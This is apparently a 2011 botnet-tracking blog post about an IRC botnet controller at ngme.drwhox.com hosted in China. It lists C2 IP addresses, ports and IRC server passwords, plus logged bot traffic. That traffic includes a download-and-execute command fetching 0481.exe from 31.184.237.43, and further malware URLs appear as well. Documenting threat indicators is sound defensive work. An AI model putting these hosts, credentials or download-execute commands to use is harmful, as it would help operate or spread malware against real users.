ngme.drwhox.com(irc botnet hosted in China Hebei Chinanet Hebei Province Network)

By Pig, May 19, 2011

Remote Host Port Number
ngme.drwhox.com:5101
possible dns :
ngme.yourwebfind.com
123.183.217.32 5101 PASS hax0r(ircd here)
213.251.170.52 80
31.184.237.43 80
60.190.223.125 6943 PASS laorosr(ircd here)

PRIVMSG #on :[d=”http://31.184.237.43/0481.exe” s=”60779 bytes”] Executed file “C:Documents and SettingsUserNameApplication Data1.tmp” – Download retries: 0
MODE [N00_USA_XP_1567294]
@ -ix

* The data identified by the following URLs was then requested from the remote web server:
o http://api.wipmania.com/
o http://31.184.237.43/0481.exe
o http://ppppnipponp.r7m.us/cgi-bin/p.cgi
o http://31.184.237.43/201.exe

chinese hosting:
http://whois.domaintools.com/123.183.217.32

Categories: Uncategorized

Previous postserver.clubautocorp.com(irc botnet hosted in United States Chicago Hostforweb Inc)

Next postirc.chimon.us(botnet hosted in Netherlands Amsterdam Denkers Ict – Ipv4 Infrastructure)